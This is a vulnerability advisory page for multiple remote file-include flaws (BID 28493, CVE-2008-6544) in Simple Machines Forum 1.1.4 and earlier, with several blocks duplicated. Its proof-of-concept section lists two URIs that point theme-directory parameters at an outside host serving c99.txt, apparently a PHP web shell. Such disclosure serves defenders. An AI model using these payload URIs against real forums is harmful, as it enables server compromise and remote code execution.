Simple Machines Forum Multiple Remote File Include Vulnerabilities
BID:28493
Info
Simple Machines Forum Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 28493 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6544 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 28 2008 12:00AM |
| Updated: | May 07 2015 05:31PM |
| Credit: | Sibertrwolf |
| Vulnerable: |
Simple Machines SMF 1.1.4 Simple Machines SMF 1.1.3 Simple Machines SMF 1.1.2 Simple Machines SMF 1.1.1 Simple Machines SMF 1.1 rc3 Simple Machines SMF 1.1 rc2 Simple Machines SMF 1.1 rc1 Simple Machines SMF 1.1 final Simple Machines SMF 1.0.9 Simple Machines SMF 1.0.8 Simple Machines SMF 1.0.7 Simple Machines SMF 1.0.6 Simple Machines SMF 1.0.5 Simple Machines SMF 1.0.4 Simple Machines SMF 1.0.2 Simple Machines SMF 1.0 -beta5p Simple Machines SMF 1.0 -beta4p Simple Machines SMF 1.0 -beta4.1 |
| Not Vulnerable: | |
Discussion
Simple Machines Forum Multiple Remote File Include Vulnerabilities
Simple Machines Forum is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Simple Machines Forum 1.1.4 is vulnerable; other versions may also be affected.
Simple Machines Forum is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Simple Machines Forum 1.1.4 is vulnerable; other versions may also be affected.
Exploit / POC
Simple Machines Forum Multiple Remote File Include Vulnerabilities
Attackers may launch attacks through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/Sources/Subs-Graphics.php?settings[default_theme_dir]=http://bilmemne.siz/c99.txt
http://www.example.com/Sources/Themes.php?settings[theme_dir]=http://bilmemne.siz/c99.txt?
Attackers may launch attacks through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/Sources/Subs-Graphics.php?settings[default_theme_dir]=http://bilmemne.siz/c99.txt
http://www.example.com/Sources/Themes.php?settings[theme_dir]=http://bilmemne.siz/c99.txt?
Solution / Fix
Simple Machines Forum Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Simple Machines Forum Multiple Remote File Include Vulnerabilities
References:
References:
- Simple Machines SMF Homepage (Simple Machines)
- Re: Smf 1.1.4 Remote File Inclusion Vulnerabilities (Jindrich Kubec
) - Re: Smf 1.1.4 Remote File Inclusion Vulnerabilities (Mike Duncan
) - Smf 1.1.4 Remote File Inclusion Vulnerabilities ([email protected])